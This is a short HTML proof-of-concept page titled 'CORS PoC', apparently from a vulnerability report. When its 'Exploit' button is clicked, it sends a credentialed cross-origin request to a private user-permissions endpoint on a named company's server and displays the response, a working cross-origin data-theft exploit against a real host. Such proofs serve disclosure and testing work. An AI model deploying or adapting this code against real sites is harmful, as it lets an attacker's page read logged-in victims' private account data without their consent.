test.html

<html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" onclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
               xhr.open("GET",
                       "https://itemoptixpr.checkpointsystems.com/eval/rest/itemoptix/private/UeZS_adl9xBmUak0KAwne7/user/perm?roleUri=/itemoptix/private/bKUFLc656_BF24Haj1rK-3/&secumode=embeded&{}", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>